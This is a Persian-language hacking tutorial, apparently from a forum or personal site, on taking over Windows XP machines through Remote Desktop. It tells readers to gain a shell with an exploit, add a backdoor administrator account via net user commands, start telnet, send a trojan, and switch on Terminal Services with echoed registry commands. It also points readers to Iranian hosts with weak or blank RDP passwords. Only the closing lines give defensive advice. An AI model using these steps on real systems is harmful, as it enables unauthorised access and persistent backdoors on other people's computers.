Remote Desktop Connection
نرم افزار Remote Desktop Connection به شما اجازه می دهد به هر رايانه ای که آدرس IP آنرا بدانيد (روشهای به دست آوردن IP به طور مفصل در سلسله مقالات آشنايی با اسب تروا بيان شده است که می توانيد به آنها رجوع کنيد) متصل شويد. پس از نوشتن آدرس IP و فشردن Connect وارد صفحه Login ويندوز سيستم هدف خواهيد شد که می توانيد با داشتن نام کاربری و رمزعبورش وارد آن شويد. پس با داشتن رمز Administrator و IP سيستم بدون اينکه کسی متوجه شود يا نرم افزار ضد ويروس کار شما را خطا بداند می توانيد با کاربر دارای بالاترين حقها به رايانه های هدف دسترسی پيدا کنيد. (اگر اينترنت را به دنبال رايانه هايی که پورت Remote Desktop باز دارند جستجو کنيد در حوزه دومينهای ايرانی سيستمهای بسياری را خواهيد يافت که رمزهای شرم آوری مانند 123 داشته باشند يا از آن بدتر رمز آنها تنها يک Enter باشد!)
اگرچه روش فوق به نظر زياد عملی نمی رسيد زيرا به حدود 10 ثانيه دسترسی فيزيکی به سيستم در شرايط Login شده با يک کاربر از نوع Computer Administrator نياز داشت، روش بيان شده در بالا اصول بسياری از روشهای نفوذ به ويندوز XP از جمله روشهايی مانند استفاده از نقص امنيتی RPC بود! پس موارد بالا را به دقت بخوانيد و با نرم افزارها و صفحاتی که باز کرديم کار کنيد تا با آنها به خوبی آشنا شويد.
خوب برايه هک کردن با برنامه ريموت دسکتاپ اول بايد کامپيوتر که ميخواهيم مورده حمله قرار بديم بايد يک اکاونت با یورر و پس ساخت که بتونيم به اون کانکت بشيم
خوب سؤالی که مطرح ميشه اینه که چه جوری ميشه این کار رو انجام داد خوب منم ميگم این کاره منه که به شما آموزش بدم
اول بايد بايد با يه اکسپلؤيت به سيستم وصل بشی و شل بگيريد وقتی به سيستم وصل شديد يک اکانت ميسازي يه اکانته ادمين تو ويندوز
بعد از اون ميريم دستوراتی که لازمه برايه فعال سازيه ريمت دسکتپ رو ميزنيم
خب اینم بگم که نو اکسپلويت زياد مهم نيست مثلا ميتنيد با اکسپليت کاهت شل بگيريد خوب بعدش این دسترت رو بزنيد
net user alex2003 123456 /add (User= alex2003 , pas=123456)
net localgroup Administrators alex2003 /add
شما ميتونيد بعد از گرفتن شل تروجان رو سيستمه طرف بفرستيد ميتونيد تلنت رو فعال کنيدو ....
c:windows\system32>net start telnet
خب بعد از ساختن اكانت نوبت به کد فعال سازي ريموت دسکتاپ ميرسه که کدها رو اینجا برتون گزشتم
[align=left:c1bd60e997][align=left]
c:windows\system32>echo Windows Registry Editor Version 5.00> c:\TS.reg
c:windows\system32>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
c:windows\system32>echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg
c:windows\system32>echo "fAllowToGetHelp"=dword:00000000>> c:\TS.reg
c:windows\system32>regedit /s c:\TS.reg
c:windows\system32>del c:\TS.reg[/align:c1bd60e997][/align]
شما بايد به ترتيب خط اول رو بنويسی بعد اینتر بزند بعدش خط دوم الي اخر بعد از اون بريد و حالشو ببريد
اميدواريم از اين نوشته نتيجه گرفته باشيد که اولاً رمز کاربر Administrator را به رمزی مناسب تغيير دهيد و ثانياً اگر امنيت سيستم شما به هر دليل اهميت دارد هرگز حتی برای چند ثانيه آنرا روشن و Login شده رها نکنيد و ثالثاً کاربری با رمز عبور Enter يا رمزهای ضعيف ديگر نداشته باشيد.
تماميه حقوق این مقاله متعلق به مهدی پارسا يعنی خودم هستش و هر گونه کپی برداری از این مقاله فقط با ذکر منبع و لينک مقاله مجاز ميباشد
www.hackprg.tk
